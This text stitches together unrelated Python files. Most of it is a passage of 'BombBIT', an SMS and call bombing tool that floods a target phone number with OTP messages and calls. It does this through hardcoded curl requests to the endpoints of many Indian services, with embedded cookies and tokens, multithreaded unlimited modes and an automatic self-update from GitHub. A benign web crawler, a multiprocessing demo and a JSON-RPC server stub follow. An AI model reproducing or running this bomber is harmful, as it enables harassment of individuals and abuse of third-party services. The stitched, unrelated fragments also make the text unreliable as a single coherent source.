os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
        rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read()  # os.popen().read() already returns text in Python 3
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
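    # target: phone number, counter: number of messages requested, delay: seconds between
    # attempts, ch: list of API indices still considered usable, cc: country code string.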
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update BombBIT')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To williamwillson4321@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print(" SMS Bombing ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print(" This Bomber Was Updated By Yash Navadiya !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
    print('\n\t\tUpdated Successfully !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting BombBIT...\n\n')
try:
noti = urllib.request.urlopen(
"https://github.com/YashkumarNavadiya/BombBIT/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
    if not str(cc + pn).isdigit():
        print('\n\nPhone Number Must Consist Of Numbers Only\n')
        continue
    break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
try:
nm = int(input("Enter Number of Calls To Send(Maximum 10): "))
except Exception:
print("Don't Worry it will take by default values")
nm=1
if nm > 10:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 10
try:
dl = float(input("Enter Delay time (in seconds) [Recommended 20 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
dl=20
elif type == 0:
if cc == "91":
try:
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
nm=5
dl=2
else:
try:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
except Exception:
print("Don't Worry it will take by default values")
nm=10
dl=10
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print('\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....\n')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1 or len(pn) > 10 or len(pn) < 10:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...\n')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tBombBIT Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
main.py
|
# -*- coding: utf-8 -*-
import sys
from urllib.request import urlopen
from bs4 import BeautifulSoup
from queue import Queue, Empty
from threading import Thread
visited = set()
queue = Queue()
def get_parser(host, root, charset):
def parse():
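        # Worker: pull URLs from the shared queue, fetch and parse each page, and
        # enqueue any same-site links that have not been visited yet.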
try:
while True:
url = queue.get_nowait()
try:
content = urlopen(url).read().decode(charset)
except UnicodeDecodeError:
continue
                for link in BeautifulSoup(content, 'html.parser').findAll('a'):
try:
href = link['href']
except KeyError:
continue
if not href.startswith('http://'):
href = 'http://%s%s' % (host, href)
if not href.startswith('http://%s%s' % (host, root)):
continue
if href not in visited:
visited.add(href)
queue.put(href)
print (href)
except Empty:
pass
return parse
if __name__ == '__main__':
host, root, charset = sys.argv[1:]
parser = get_parser(host, root, charset)
queue.put('http://%s%s' % (host, root))
workers = []
for i in range(5):
worker = Thread(target=parser)
worker.start()
workers.append(worker)
for worker in workers:
worker.join()
|
a.py
|
#
# Copyright 2015 riteme
#
from multiprocessing import *
import os
def proc(name):
print 'Running child process \"' + name +'\", pid:', os.getpid()
if __name__ == "__main__":
print 'Parent process is', os.getpid()
new_proc = Process(target = proc, args = ('A',))
print 'Process will start'
new_proc.start()
new_proc.join()
print 'Process end'
|
data_api2Server.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
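# Roughly, an error response from this service looks like
#   {"error": {"code": ..., "name": ..., "message": ..., "error": "<traceback>"}}
# whereas JSON-RPC 2.0 uses {"code": ..., "message": ..., "data": ...} for the error object.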
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'data_api2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from data_api2.data_api2Impl import data_api2
impl_data_api2 = data_api2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
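# Each '<method>_async' / '<method>_check' entry maps the wrapper name to its underlying
# [module, method] pair; sync_methods flags methods that may also be called synchronously.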
async_run_methods['data_api2.get_taxon_async'] = ['data_api2', 'get_taxon']
async_check_methods['data_api2.get_taxon_check'] = ['data_api2', 'get_taxon']
sync_methods['data_api2.get_taxon'] = True
async_run_methods['data_api2.get_assembly_async'] = ['data_api2', 'get_assembly']
async_check_methods['data_api2.get_assembly_check'] = ['data_api2', 'get_assembly']
sync_methods['data_api2.get_assembly'] = True
async_run_methods['data_api2.get_feature_types_async'] = ['data_api2', 'get_feature_types']
async_check_methods['data_api2.get_feature_types_check'] = ['data_api2', 'get_feature_types']
sync_methods['data_api2.get_feature_types'] = True
async_run_methods['data_api2.get_feature_type_descriptions_async'] = ['data_api2', 'get_feature_type_descriptions']
async_check_methods['data_api2.get_feature_type_descriptions_check'] = ['data_api2', 'get_feature_type_descriptions']
sync_methods['data_api2.get_feature_type_descriptions'] = True
async_run_methods['data_api2.get_feature_type_counts_async'] = ['data_api2', 'get_feature_type_counts']
async_check_methods['data_api2.get_feature_type_counts_check'] = ['data_api2', 'get_feature_type_counts']
sync_methods['data_api2.get_feature_type_counts'] = True
async_run_methods['data_api2.get_feature_ids_async'] = ['data_api2', 'get_feature_ids']
async_check_methods['data_api2.get_feature_ids_check'] = ['data_api2', 'get_feature_ids']
sync_methods['data_api2.get_feature_ids'] = True
async_run_methods['data_api2.get_features_async'] = ['data_api2', 'get_features']
async_check_methods['data_api2.get_features_check'] = ['data_api2', 'get_features']
sync_methods['data_api2.get_features'] = True
async_run_methods['data_api2.get_proteins_async'] = ['data_api2', 'get_proteins']
async_check_methods['data_api2.get_proteins_check'] = ['data_api2', 'get_proteins']
sync_methods['data_api2.get_proteins'] = True
